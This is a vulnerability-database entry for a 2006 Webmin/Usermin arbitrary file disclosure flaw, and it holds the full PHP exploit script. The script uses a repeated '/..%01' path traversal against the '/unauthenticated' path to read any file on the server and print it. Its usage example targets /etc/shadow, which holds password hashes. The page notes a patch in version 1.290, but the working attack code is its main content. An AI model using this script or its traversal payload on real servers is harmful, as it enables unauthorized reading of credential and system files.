Lucene search

K

webmin.php.txt

🗓️ 12 Jul 2006 00:00:00Reported by jofferType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 18 Views

Webmin/Usermin file disclosure vulnerability; patch available in version 1.290.

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`<?php  
/*  
Name : Webmin / Usermin Arbitrary File Disclosure Vulnerability  
Date : 2006-06-30  
Patch : update to version 1.290  
Advisory : http://securitydot.net/vuln/exploits/vulnerabilities/articles/17885/vuln.html  
Coded by joffer , http://securitydot.net  
*/  
  
$host = $argv[1];  
$port = $argv[2];  
$http = $argv[3];  
$file = $argv[4];  
// CHECKING THE INPUT  
if($host != "" && $port != "" && $http != "" && $file != "") {  
  
  
$z = "/..%01";  
for ($i=0;$i<60;$i++) {  
$z.="/..%01";  
}  
  
$target = $http."://".$host.":".$port."/unauthenticated".$z."/".$file."";  
  
echo "Attacking ".$host."\n";  
echo "---------------------------------\n";  
  
// INITIALIZING CURL SESSION TO THE TARGET  
  
$ch = curl_init();  
  
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);  
curl_setopt($ch, CURLOPT_URL, $target);  
curl_setopt ($ch, CURLOPT_TIMEOUT, '10');  
curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,FALSE);  
  
$content = curl_exec($ch);  
curl_close ($ch);  
  
// CLOSING CURL  
  
// ECHOING THE CONTENT OF THE $FILE  
echo $content;  
  
echo "---------------------------------\n";  
echo "Coded by joffer , http://securitydot.net\n";  
  
} else {  
// IF INPUT IS NOT CORRECT DISPLAY THE README  
echo "Usage php webmin.php HOST PORT HTTP/HTTPS FILE\n";  
echo "Example : php webmin.php localhost 10000 http /etc/shadow\n";  
echo "Coded by joffer , http://securitydot.net\n";  
}  
  
?>  
securitydot.net - 2006-07-09  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
12 Jul 2006 00:00Current
7.4High risk
Vulners AI Score7.4
18
.json
Report